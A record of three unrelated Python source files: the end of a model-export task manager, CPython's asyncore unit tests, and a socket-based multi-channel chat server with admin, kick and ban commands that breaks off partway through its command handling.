safe_clean_folder(export_status_path)
p = mp.Process(
target=_call_paddlex_export_infer,
args=(task_path, save_dir, export_status_path, epoch))
p.start()
set_folder_status(export_status_path, TaskStatus.XEXPORTING, p.pid)
set_folder_status(task_path, TaskStatus.XEXPORTING, p.pid)
return p
def opt_lite_model(model_path, save_dir=None, place='arm'):
p = mp.Process(
target=_call_paddlelite_export_lite,
args=(model_path, save_dir, place))
p.start()
p.join()
def stop_export_task(task_path):
"""停止导出
Args:
task_path(str): 从task_path下的'export/XEXPORTING'文件中获取训练的进程id
Return:
the export status and message.
"""
export_status_path = osp.join(task_path, './logs/export')
if not osp.exists(export_status_path):
return None, "{}任务目录下没有export文件夹".format(task_path)
status, message = get_folder_status(export_status_path, True)
if status == TaskStatus.XEXPORTING:
pid = int(message)
is_dead = False
if not psutil.pid_exists(pid):
is_dead = True
else:
p = psutil.Process(pid)
if p.status() == 'zombie':
is_dead = True
if is_dead:
status = TaskStatus.XEXPORTFAIL
message = "导出过程出现异常,请尝试重新评估!"
set_folder_status(export_status_path, status, message)
else:
pkill(pid)
status = TaskStatus.XEXPORTFAIL
message = "已停止导出进程!"
set_folder_status(export_status_path, status, message)
if status not in [
TaskStatus.XEXPORTING, TaskStatus.XEXPORTED, TaskStatus.XEXPORTFAIL
]:
raise ValueError("获取到的导出状态异常,{}。".format(status))
return status, message
|
test_asyncore.py
|
import asyncore
import unittest
import select
import os
import socket
import sys
import time
import warnings
import errno
import struct
from test import support
from test.support import TESTFN, run_unittest, unlink, HOST, HOSTv6
from io import BytesIO
from io import StringIO
try:
import threading
except ImportError:
threading = None
HAS_UNIX_SOCKETS = hasattr(socket, 'AF_UNIX')
class dummysocket:
def __init__(self):
self.closed = False
def close(self):
self.closed = True
def fileno(self):
return 42
class dummychannel:
def __init__(self):
self.socket = dummysocket()
def close(self):
self.socket.close()
class exitingdummy:
def __init__(self):
pass
def handle_read_event(self):
raise asyncore.ExitNow()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
class crashingdummy:
def __init__(self):
self.error_handled = False
def handle_read_event(self):
raise Exception()
handle_write_event = handle_read_event
handle_close = handle_read_event
handle_expt_event = handle_read_event
def handle_error(self):
self.error_handled = True
# used when testing senders; just collects what it gets until newline is sent
def capture_server(evt, buf, serv):
try:
serv.listen(5)
conn, addr = serv.accept()
except socket.timeout:
pass
else:
n = 200
start = time.time()
while n > 0 and time.time() - start < 3.0:
r, w, e = select.select([conn], [], [], 0.1)
if r:
n -= 1
data = conn.recv(10)
# keep everything except for the newline terminator
buf.write(data.replace(b'\n', b''))
if b'\n' in data:
break
time.sleep(0.01)
conn.close()
finally:
serv.close()
evt.set()
def bind_af_aware(sock, addr):
"""Helper function to bind a socket according to its family."""
if HAS_UNIX_SOCKETS and sock.family == socket.AF_UNIX:
# Make sure the path doesn't exist.
unlink(addr)
sock.bind(addr)
class HelperFunctionTests(unittest.TestCase):
def test_readwriteexc(self):
# Check exception handling behavior of read, write and _exception
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore read/write/_exception calls
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.read, tr1)
self.assertRaises(asyncore.ExitNow, asyncore.write, tr1)
self.assertRaises(asyncore.ExitNow, asyncore._exception, tr1)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
asyncore.read(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore.write(tr2)
self.assertEqual(tr2.error_handled, True)
tr2 = crashingdummy()
asyncore._exception(tr2)
self.assertEqual(tr2.error_handled, True)
# asyncore.readwrite uses constants in the select module that
# are not present in Windows systems (see this thread:
# http://mail.python.org/pipermail/python-list/2001-October/109973.html)
# These constants should be present as long as poll is available
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
def test_readwrite(self):
# Check that correct methods are called by readwrite()
attributes = ('read', 'expt', 'write', 'closed', 'error_handled')
expected = (
(select.POLLIN, 'read'),
(select.POLLPRI, 'expt'),
(select.POLLOUT, 'write'),
(select.POLLERR, 'closed'),
(select.POLLHUP, 'closed'),
(select.POLLNVAL, 'closed'),
)
class testobj:
def __init__(self):
self.read = False
self.write = False
self.closed = False
self.expt = False
self.error_handled = False
def handle_read_event(self):
self.read = True
def handle_write_event(self):
self.write = True
def handle_close(self):
self.closed = True
def handle_expt_event(self):
self.expt = True
def handle_error(self):
self.error_handled = True
for flag, expectedattr in expected:
tobj = testobj()
self.assertEqual(getattr(tobj, expectedattr), False)
asyncore.readwrite(tobj, flag)
# Only the attribute modified by the routine we expect to be
# called should be True.
for attr in attributes:
self.assertEqual(getattr(tobj, attr), attr==expectedattr)
# check that ExitNow exceptions in the object handler method
# bubbles all the way up through asyncore readwrite call
tr1 = exitingdummy()
self.assertRaises(asyncore.ExitNow, asyncore.readwrite, tr1, flag)
# check that an exception other than ExitNow in the object handler
# method causes the handle_error method to get called
tr2 = crashingdummy()
self.assertEqual(tr2.error_handled, False)
asyncore.readwrite(tr2, flag)
self.assertEqual(tr2.error_handled, True)
def test_closeall(self):
self.closeall_check(False)
def test_closeall_default(self):
self.closeall_check(True)
def closeall_check(self, usedefault):
# Check that close_all() closes everything in a given map
l = []
testmap = {}
for i in range(10):
c = dummychannel()
l.append(c)
self.assertEqual(c.socket.closed, False)
testmap[i] = c
if usedefault:
socketmap = asyncore.socket_map
try:
asyncore.socket_map = testmap
asyncore.close_all()
finally:
testmap, asyncore.socket_map = asyncore.socket_map, socketmap
else:
asyncore.close_all(testmap)
self.assertEqual(len(testmap), 0)
for c in l:
self.assertEqual(c.socket.closed, True)
def test_compact_traceback(self):
try:
raise Exception("I don't like spam!")
except:
real_t, real_v, real_tb = sys.exc_info()
r = asyncore.compact_traceback()
else:
self.fail("Expected exception")
(f, function, line), t, v, info = r
self.assertEqual(os.path.split(f)[-1], 'test_asyncore.py')
self.assertEqual(function, 'test_compact_traceback')
self.assertEqual(t, real_t)
self.assertEqual(v, real_v)
self.assertEqual(info, '[%s|%s|%s]' % (f, function, line))
class DispatcherTests(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
def test_basic(self):
d = asyncore.dispatcher()
self.assertEqual(d.readable(), True)
self.assertEqual(d.writable(), True)
def test_repr(self):
d = asyncore.dispatcher()
self.assertEqual(repr(d), '<asyncore.dispatcher at %#x>' % id(d))
def test_log(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log() (to stderr)
fp = StringIO()
stderr = sys.stderr
l1 = "Lovely spam! Wonderful spam!"
l2 = "I don't like spam!"
try:
sys.stderr = fp
d.log(l1)
d.log(l2)
finally:
sys.stderr = stderr
lines = fp.getvalue().splitlines()
self.assertEqual(lines, ['log: %s' % l1, 'log: %s' % l2])
def test_log_info(self):
d = asyncore.dispatcher()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
l1 = "Have you got anything without spam?"
l2 = "Why can't she have egg bacon spam and sausage?"
l3 = "THAT'S got spam in it!"
try:
sys.stdout = fp
d.log_info(l1, 'EGGS')
d.log_info(l2)
d.log_info(l3, 'SPAM')
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['EGGS: %s' % l1, 'info: %s' % l2, 'SPAM: %s' % l3]
self.assertEqual(lines, expected)
def test_unhandled(self):
d = asyncore.dispatcher()
d.ignore_log_types = ()
# capture output of dispatcher.log_info() (to stdout via print)
fp = StringIO()
stdout = sys.stdout
try:
sys.stdout = fp
d.handle_expt()
d.handle_read()
d.handle_write()
d.handle_connect()
finally:
sys.stdout = stdout
lines = fp.getvalue().splitlines()
expected = ['warning: unhandled incoming priority event',
'warning: unhandled read event',
'warning: unhandled write event',
'warning: unhandled connect event']
self.assertEqual(lines, expected)
def test_issue_8594(self):
# XXX - this test is supposed to be removed in next major Python
# version
d = asyncore.dispatcher(socket.socket())
# make sure the error message no longer refers to the socket
# object but the dispatcher instance instead
self.assertRaisesRegex(AttributeError, 'dispatcher instance',
getattr, d, 'foo')
# cheap inheritance with the underlying socket is supposed
# to still work but a DeprecationWarning is expected
with warnings.catch_warnings(record=True) as w:
warnings.simplefilter("always")
family = d.family
self.assertEqual(family, socket.AF_INET)
self.assertEqual(len(w), 1)
self.assertTrue(issubclass(w[0].category, DeprecationWarning))
def test_strerror(self):
# refers to bug #8573
err = asyncore._strerror(errno.EPERM)
if hasattr(os, 'strerror'):
self.assertEqual(err, os.strerror(errno.EPERM))
err = asyncore._strerror(-1)
self.assertTrue(err != "")
class dispatcherwithsend_noread(asyncore.dispatcher_with_send):
def readable(self):
return False
def handle_connect(self):
pass
class DispatcherWithSendTests(unittest.TestCase):
usepoll = False
def setUp(self):
pass
def tearDown(self):
asyncore.close_all()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_send(self):
evt = threading.Event()
sock = socket.socket()
sock.settimeout(3)
port = support.bind_port(sock)
cap = BytesIO()
args = (evt, cap, sock)
t = threading.Thread(target=capture_server, args=args)
t.start()
try:
# wait a little longer for the server to initialize (it sometimes
# refuses connections on slow machines without this wait)
time.sleep(0.2)
data = b"Suppose there isn't a 16-ton weight?"
d = dispatcherwithsend_noread()
d.create_socket()
d.connect((HOST, port))
# give time for socket to connect
time.sleep(0.1)
d.send(data)
d.send(data)
d.send(b'\n')
n = 1000
while d.out_buffer and n > 0:
asyncore.poll()
n -= 1
evt.wait()
self.assertEqual(cap.getvalue(), data*2)
finally:
t.join()
class DispatcherWithSendTests_UsePoll(DispatcherWithSendTests):
usepoll = True
@unittest.skipUnless(hasattr(asyncore, 'file_wrapper'),
'asyncore.file_wrapper required')
class FileWrapperTest(unittest.TestCase):
def setUp(self):
self.d = b"It's not dead, it's sleeping!"
with open(TESTFN, 'wb') as file:
file.write(self.d)
def tearDown(self):
unlink(TESTFN)
def test_recv(self):
fd = os.open(TESTFN, os.O_RDONLY)
w = asyncore.file_wrapper(fd)
os.close(fd)
self.assertNotEqual(w.fd, fd)
self.assertNotEqual(w.fileno(), fd)
self.assertEqual(w.recv(13), b"It's not dead")
self.assertEqual(w.read(6), b", it's")
w.close()
self.assertRaises(OSError, w.read, 1)
def test_send(self):
d1 = b"Come again?"
d2 = b"I want to buy some cheese."
fd = os.open(TESTFN, os.O_WRONLY | os.O_APPEND)
w = asyncore.file_wrapper(fd)
os.close(fd)
w.write(d1)
w.send(d2)
w.close()
with open(TESTFN, 'rb') as file:
self.assertEqual(file.read(), self.d + d1 + d2)
@unittest.skipUnless(hasattr(asyncore, 'file_dispatcher'),
'asyncore.file_dispatcher required')
def test_dispatcher(self):
fd = os.open(TESTFN, os.O_RDONLY)
data = []
class FileDispatcher(asyncore.file_dispatcher):
def handle_read(self):
data.append(self.recv(29))
s = FileDispatcher(fd)
os.close(fd)
asyncore.loop(timeout=0.01, use_poll=True, count=2)
self.assertEqual(b"".join(data), self.d)
class BaseTestHandler(asyncore.dispatcher):
def __init__(self, sock=None):
asyncore.dispatcher.__init__(self, sock)
self.flag = False
def handle_accept(self):
raise Exception("handle_accept not supposed to be called")
def handle_accepted(self):
raise Exception("handle_accepted not supposed to be called")
def handle_connect(self):
raise Exception("handle_connect not supposed to be called")
def handle_expt(self):
raise Exception("handle_expt not supposed to be called")
def handle_close(self):
raise Exception("handle_close not supposed to be called")
def handle_error(self):
raise
class BaseServer(asyncore.dispatcher):
"""A server which listens on an address and dispatches the
connection to a handler.
"""
def __init__(self, family, addr, handler=BaseTestHandler):
asyncore.dispatcher.__init__(self)
self.create_socket(family)
self.set_reuse_addr()
bind_af_aware(self.socket, addr)
self.listen(5)
self.handler = handler
@property
def address(self):
return self.socket.getsockname()
def handle_accepted(self, sock, addr):
self.handler(sock)
def handle_error(self):
raise
class BaseClient(BaseTestHandler):
def __init__(self, family, address):
BaseTestHandler.__init__(self)
self.create_socket(family)
self.connect(address)
def handle_connect(self):
pass
class BaseTestAPI:
def tearDown(self):
asyncore.close_all()
def loop_waiting_for_flag(self, instance, timeout=5):
timeout = float(timeout) / 100
count = 100
while asyncore.socket_map and count > 0:
asyncore.loop(timeout=0.01, count=1, use_poll=self.use_poll)
if instance.flag:
return
count -= 1
time.sleep(timeout)
self.fail("flag not set")
def test_handle_connect(self):
# make sure handle_connect is called on connect()
class TestClient(BaseClient):
def handle_connect(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_accept(self):
# make sure handle_accept() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_accepted(self):
# make sure handle_accepted() is called when a client connects
class TestListener(BaseTestHandler):
def __init__(self, family, addr):
BaseTestHandler.__init__(self)
self.create_socket(family)
bind_af_aware(self.socket, addr)
self.listen(5)
self.address = self.socket.getsockname()
def handle_accept(self):
asyncore.dispatcher.handle_accept(self)
def handle_accepted(self, sock, addr):
sock.close()
self.flag = True
server = TestListener(self.family, self.addr)
client = BaseClient(self.family, server.address)
self.loop_waiting_for_flag(server)
def test_handle_read(self):
# make sure handle_read is called on data received
class TestClient(BaseClient):
def handle_read(self):
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.send(b'x' * 1024)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_write(self):
# make sure handle_write is called
class TestClient(BaseClient):
def handle_write(self):
self.flag = True
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close(self):
# make sure handle_close is called when the other end closes
# the connection
class TestClient(BaseClient):
def handle_read(self):
# in order to make handle_close be called we are supposed
# to make at least one recv() call
self.recv(1024)
def handle_close(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self):
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(bytes(chr(244), 'latin-1'), socket.MSG_OOB)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else:
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
self.assertEqual(s.socket.family, self.family)
SOCK_NONBLOCK = getattr(socket, 'SOCK_NONBLOCK', 0)
self.assertEqual(s.socket.type, socket.SOCK_STREAM | SOCK_NONBLOCK)
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
sock = socket.socket(self.family)
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except socket.error:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
finally:
sock.close()
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.reap_threads
def test_quick_connect(self):
# see: http://bugs.python.org/issue10340
if self.family in (socket.AF_INET, getattr(socket, "AF_INET6", object())):
server = BaseServer(self.family, self.addr)
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=500))
t.start()
self.addCleanup(t.join)
s = socket.socket(self.family, socket.SOCK_STREAM)
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except socket.error:
pass
finally:
s.close()
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = support.TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
if __name__ == "__main__":
unittest.main()
|
server.py
|
from socket import AF_INET, socket, SOCK_STREAM, SOL_SOCKET, SO_REUSEADDR
from threading import Thread
from re import match
# A few colors that will be used in text messaging. This is not compatible with the Windows Terminal.
# You might try using Cmder instead (or any terminal compatible with ANSI Escape Sequences).
COLOR_SUPERADMIN = '\033[95m'
COLOR_ADMIN = '\033[91m'
COLOR_DEFAULT = '\033[39m'
COLOR_SYS = '\033[92m'
STYLE_DIM = '\033[2m'
STYLE_DIM_RESET = '\033[22m'
class Channel:
''' Is a channel with a name, and some members.
• Attributes:
name: Its name, used by users to find the channel
members: All members, admins included
admins: Only the admin members '''
def __init__(self, name):
self.name = name
self.members = []
self.admins = []
class User:
''' Is a client socket, and many other information and methods.
• Class attributes:
instances: A list of all the instances of the User class.
channels: A list of all channels' names.
banned: A list of all banned users.
• Attributes:
sock: The socket used to listening and sending data to the client.
address: The user's address. Used for banning someone.
nickname: Its nickname.
format_nick: The nickname, formatted (admin are in red, superadmin in magenta and others in the default color).
current: The current channel.
superadmin: Is this user a superadministrator?
• Methods:
switch: Change user's current channel
find_channel Search for a channel according to its name and returns the channel object (or None if nothing's found)
find_user: Search for a user according to its name and returns the user object (or None if nothing's found)
change_nick: Change user's nickname
refresh_format_nick Refresh the formatted nickname (usuful if the person is no longer admin or was granted admin)
kick Kick the user out of the current channel. He goes back to the Main channel.
recv Wait to receive data from the users. The waiting state for the main loop used in handle_user.
send Send a message to the user. You can use "sys = False" in the function call to diplay the message as a user message.
send_channel Send a message to everyone on the channel. You can use "to_self = False" to avoid sending the message to yourself.
send_channels Send a message to all channel the user has joined. You can use "to_current = False" to avoid sending it to the current channel.
send_all Send a message to everyone on the server.
'''
instances = []
channels = [Channel('VOID'), Channel('MAIN')]
banned = []
def __init__(self, sock, address):
self.sock = sock
self.address = address[0]
self.nickname = None
self.format_nick = ''
self.current = self.find_channel('VOID')
self.current.members += [self]
self.superadmin = False
self.instances.append(self)
def find_channel(self, name):
for channel in self.channels:
if channel.name == name:
return channel
def find_user(self, nick):
for user in self.current.members:
if user.nickname == nick:
return user
def switch(self, channel):
self.current = channel
self.refresh_format_nick()
# Alert everyone on the channel that the user has joined.
self.send('You are now in the channel "' + channel.name + '".\n')
self.send_channel(self.format_nick + ' has joined the channel!', to_self = False, to_currents_only = True)
def change_nick(self, nickname):
# Make sure the nickname has a correct form (alphanumerical characters only and no spaces)
if not bool(match('^[a-zA-Z0-9]+$', nickname)):
self.send('Error: Your name must only contain letters, numbers, and no spaces. Please retry.')
# Make sure the nickname isn't already use
elif nickname in [user.nickname for user in self.instances]:
self.send('Error: This name is already taken. Please choose another one.')
else:
old_nickname = self.format_nick
self.nickname = nickname
self.refresh_format_nick()
self.send('Your nickname is now ' + self.format_nick + '.')
self.send_channels(old_nickname + ' changed its name to ' + self.format_nick + '.', to_self = False)
def refresh_format_nick(self):
if self.superadmin:
self.format_nick = COLOR_SUPERADMIN + self.nickname + COLOR_SYS
elif self in self.current.admins:
self.format_nick = COLOR_ADMIN + self.nickname + COLOR_SYS
else:
self.format_nick = COLOR_DEFAULT + self.nickname + COLOR_SYS
def kick(self, nick):
for user in self.current.members:
if user.nickname == nick:
if not user.superadmin:
# If the user is not on the MAIN channel, make it leave the current channel and switch to MAIN channel instead.
channel = self.find_channel('MAIN')
if user.current != channel:
user.send('You have been kicked from ' + user.current.name + ' by ' + self.format_nick + '.')
old_channel = user.current
user.switch(channel)
# Remove the user from the previous channel
if user in old_channel.members: old_channel.members.remove(user)
if user in old_channel.admins: old_channel.admins.remove(user)
else:
if self.superadmin:
self.send(user.format_nick + ' cannot be kicked because it is already on channel "Main".\nMaybe try the command /TIMEOUT or /BAN instead.')
else:
self.send(user.format_nick + ' cannot be kicked because it is already on channel "Main".\nMaybe ask a SuperAdmin for help.')
return
else:
self.send('You are not allowed to kick a SuperAdmin!')
return
user.send(nick + ' is not currently connected or not on this channel.')
def recv(self):
return self.sock.recv(buffer_size).decode('utf8')
def send(self, msg, sys = True):
if sys: msg = COLOR_SYS + msg + '\n' + COLOR_DEFAULT
try:
self.sock.send(bytes(msg + '\n', 'utf8'))
except Exception:
del_user(self)
def send_channel(self, msg, sys = True, to_self = True, to_non_currents_only = False, to_currents_only = False):
for user in self.current.members:
if to_non_currents_only and user.current != self.current:
user.send(msg, sys)
elif to_currents_only and user.current == self.current:
user.send(msg, sys)
elif not to_non_currents_only and not to_currents_only:
user.send(msg, sys)
def send_channels(self, msg, sys = True, to_self = True, to_current = True, to_MAIN = True):
sender_channels = []
for channel in self.channels:
if self in channel.members:
if (channel != self.current or to_current) and (channel.name != 'MAIN' or to_MAIN):
sender_channels += [channel]
for user in self.instances:
if user.current in sender_channels:
if user.nickname != self.nickname or to_self:
user.send(msg, sys)
def send_all(self, msg, sys = True, to_self = True):
for user in self.instances:
if user.nickname != self.nickname or to_self:
user.send(msg, sys)
def del_user(user):
'''Used to delete a outgoing user. Delete it from everywhere before closing the connection.'''
user.send_channels(user.format_nick + ' has left the chat.', to_self = False)
for channel in user.channels:
if user in channel.members: channel.members.remove(user)
if user in channel.admins: channel.admins.remove(user)
user.sock.close()
if user in user.instances: user.instances.remove(user)
def accept_incoming_connections():
'''Sets up handling for incoming clients.'''
while True:
client, client_address = server.accept()
user = User(client, client_address)
if user.address not in user.banned:
print(user.address + ' has connected.')
Thread(target=handle_user, args=(user,)).start()
else:
print(user.address + ' tried to connect, but it is banned.')
user.send('You are ban from this server.')
del_user(user)
def handle_user(user):
'''Handles a single user.'''
if len(user.instances) == 1:
user.superadmin = True
user.send('Welcome, you are the first connected on the chat.\nThus, by the rules of this kingdom,\nyou shall be granted the title of ' + COLOR_SUPERADMIN + 'SuperAdmin.' + COLOR_SYS)
user.send('Please, allow me to ask for your name, Your Majesty...')
else:
user.send('Welcome! Please type your name and then press enter!')
# Continue to ask if the nickname proposed isn't acceptable.
while user.nickname == None:
# If the connection has been lost, properly kill delete the user and stop the loop.
try: proposed_name = user.recv()
except Exception:
print(user.address + ' was forcibly closed by the remote host.')
del_user(user)
return
user.change_nick(proposed_name)
user.send('Welcome ' + user.format_nick + '! You can type /HELP to display all available commands.')
user.current.members.remove(user)
# Add the user to MAIN
channel = user.find_channel('MAIN')
channel.members += [user]
if user.superadmin: channel.admins += [user]
user.switch(channel)
# The main loop. While the connection is established
while True:
# If the connection has been lost, properly kill delete the user and stop the loop.
try: msg = user.recv()
except Exception:
print(user.address + ' was forcibly closed by the remote host.')
del_user(user)
break
# We have received a message from the user. Let's handle every command he might use.
if msg == '[COMMAND] HELP':
tmp = 'SuperAdmins have a ' + COLOR_SUPERADMIN + 'magenta name' + COLOR_SYS
tmp += ', admins have a ' + COLOR_ADMIN + 'red name' + COLOR_SYS + ', private message are ' + STYLE_DIM + 'shown dimmed.\n'+ STYLE_DIM_RESET
tmp += 'Here is the list of all available commands:\n'
tmp += ' - /HELP: print this message.\n'
tmp += ' - <message>: send a message in current channel.\n'
tmp += ' - /LIST: list all available channels on server.\n'
tmp += ' - /JOIN <channel>: join (or create) a channel.\n'
tmp += ' - /LEAVE: leave current channel.\n'
tmp += ' - /WHO: list users in current channel.\n'
tmp += ' - /MSG <nick1;nick2;...> <message>: send a private message to user(s) in the current channel.\n'
tmp += ' - /BYE: disconnect from server.\n'
tmp += ' - /CURRENT: print the current channel, and the channel you are member of.\n'
tmp += ' - /CURRENT <channel>: set current channel.\n'
tmp += ' - /NICK <nick>: change user nickname on server.\n'
if user in user.current.admins:
tmp += '\nAdmins have also access to the following commands:.\n'
tmp += ' - /KICK <nick>: kick user from current channel.\n'
tmp += ' - /REN <channel>: change the current channel name.\n'
tmp += ' - /GRANT <nick>: grant admin privileges to a user.\n'
tmp += ' - /REVOKE <nick>: revoke admin privileges.\n'
if user.superadmin:
tmp += '\nSuperAdmins have also access to the following commands:\n'
tmp += ' - /SHOUT <message>: send a public message to everyone, regardless of the channel.\n'
tmp += ' - /BAN <nick>: forbid a IP adress to connect to the server.\n'
else:
tmp += '\nYou will need the help of a SuperAdmin to ban a disrespectful user.\n'
user.send(tmp)
elif msg == '[COMMAND] LIST':
tmp = 'Here are all available channels:\n'
for channel in user.channels:
if channel.name != 'VOID': tmp += ' - ' + channel.name + '\n'
user.send(tmp)
elif msg[:len('[COMMAND] JOIN ')] == '[COMMAND] JOIN ':
desired_channel = msg[len('[COMMAND] JOIN '):]
channel = user.find_channel(desired_channel)
# If channel doesn't exist, create it and become admin of this channel
if channel == None:
# Except if the name is invalid
if not bool(match('^[a-zA-Z0-9]+$', desired_channel)):
user.send('Error: A channel\'s name must only contain letters, numbers, and no spaces. Please retry.')
else:
new_channel = Channel(desired_channel)
user.channels += [new_channel]
new_channel.members += [user]
new_channel.admins += [user]
user.switch(new_channel)
# Forbid user to go to VOID
elif channel.name == 'VOID':
self.send('Error: This channel cannot be accessed. Please try something else.')
# If the user isn't part of the channel, it joins it
elif user not in channel.members:
channel.members += [user]
# Add the superadmins in the desired channel admins if it's not already the case
if user.superadmin and user not in channel.admins: channel.admins += [user]
user.switch(channel)
else:
user.send('Error: You already joined this channel. Use /CURRENT ' + channel.name + ', to change your current channel.')
elif msg == '[COMMAND] LEAVE':
if user.current.name != 'MAIN':
old_channel = user.current
user.send_channel(user.format_nick + ' has left the channel.', to_self = False, to_currents_only = True)
user.switch(user.find_channel('MAIN'))
# Remove the user from the previous channel
if user in old_channel.members: old_channel.members.remove(user)
if user in old_channel.admins: old_channel.admins.remove(user)
# If there is not longer any member in the old channel, remove the channel.
if len(old_channel.members) == 0: user.channels.remove(old_channel)
else:
user.send('You cannot leave while being in the MAIN channel. If you wish to leave, use the command /BYE.')
elif msg == '[COMMAND] WHO':
tmp = 'Here are all users in "' + user.current.name + '":\n'
for client in user.current.members:
tmp += ' - ' + client.format_nick + '\n'
user.send(tmp)
